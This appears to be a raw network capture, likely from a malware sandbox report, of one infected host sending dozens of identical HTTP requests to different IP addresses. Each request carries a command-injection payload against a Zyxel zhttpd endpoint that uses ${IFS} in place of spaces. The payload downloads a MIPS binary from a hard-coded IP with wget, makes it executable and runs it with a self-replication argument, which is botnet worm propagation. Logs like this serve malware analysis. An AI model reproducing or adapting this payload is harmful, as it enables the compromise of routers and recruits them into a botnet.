                                    Jan 13, 2024 19:02:20.855252981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1015192.168.2.134533647.96.136.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855288029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1016192.168.2.1345868135.81.176.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855340004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1017192.168.2.1353688152.31.118.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855360031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1018192.168.2.1350796108.33.20.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855411053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1019192.168.2.1348890221.47.101.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855463028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1020192.168.2.1344400174.41.241.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855494976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1021192.168.2.135885664.111.41.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855523109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1022192.168.2.1337902143.225.202.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855552912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1023192.168.2.135136217.115.126.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855587959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1024192.168.2.135464839.19.146.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855643034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1025192.168.2.133980658.74.190.189443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855720997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1026192.168.2.1351020220.224.85.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855729103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1027192.168.2.13340625.255.128.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855748892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1028192.168.2.1337902176.223.108.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855793953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1029192.168.2.133823846.55.201.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855825901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1030192.168.2.135627661.255.81.26443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855854034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1031192.168.2.133524480.231.247.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855887890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1032192.168.2.1357512128.76.101.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855928898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1033192.168.2.1339754157.100.0.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.855987072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1034192.168.2.1336326163.119.243.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856030941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1035192.168.2.1349706180.254.109.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856070042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1036192.168.2.133443846.31.61.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856115103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1037192.168.2.1351678211.4.44.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856138945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1038192.168.2.1348732160.253.14.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856185913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1039192.168.2.136099437.240.233.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856210947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1040192.168.2.134425437.227.199.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856255054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1041192.168.2.1357144195.161.197.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856287956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1042192.168.2.1356644152.202.205.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856319904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1043192.168.2.1344988135.134.20.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856357098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1044192.168.2.1340066123.176.35.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856378078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1045192.168.2.1335760222.214.58.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856436014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1046192.168.2.135909653.90.255.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856465101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1047192.168.2.1340686112.211.60.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856491089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1048192.168.2.133384424.26.75.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856543064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1049192.168.2.1350864102.95.85.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856576920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1050192.168.2.1334454176.161.178.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856601954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1051192.168.2.1355968107.148.138.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856645107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1052192.168.2.133854080.149.245.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856673956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1053192.168.2.1353172202.5.135.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856728077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1054192.168.2.135359248.125.211.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856760025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1055192.168.2.1337448170.162.107.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856794119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1056192.168.2.1355970192.132.119.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856827021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1057192.168.2.134094481.80.234.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856851101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1058192.168.2.1350790162.55.112.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856878042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1059192.168.2.1357410142.85.172.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856916904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1060192.168.2.1333726184.148.160.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856946945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1061192.168.2.1344408195.162.235.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.856978893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1062192.168.2.1354780114.251.53.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857011080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1063192.168.2.1354386221.186.214.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857043028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1064192.168.2.134281464.128.144.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857086897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1065192.168.2.1345252141.192.129.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857136965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1066192.168.2.135374659.102.74.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857172012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1067192.168.2.1345584223.8.109.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857223034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1068192.168.2.1340918206.209.83.134443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857264042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1069192.168.2.1360432109.43.178.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857316017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1070192.168.2.134317457.253.176.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857342958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1071192.168.2.1357698193.211.109.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857382059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1072192.168.2.1345550221.206.120.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857443094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1073192.168.2.1332878221.49.54.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857476950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1074192.168.2.135141814.203.175.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857511997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1075192.168.2.1342888134.86.45.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857537031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1076192.168.2.135141060.54.29.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.857573032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1077192.168.2.134865295.241.240.118443
                                    TimestampBytes transferredDirectionData
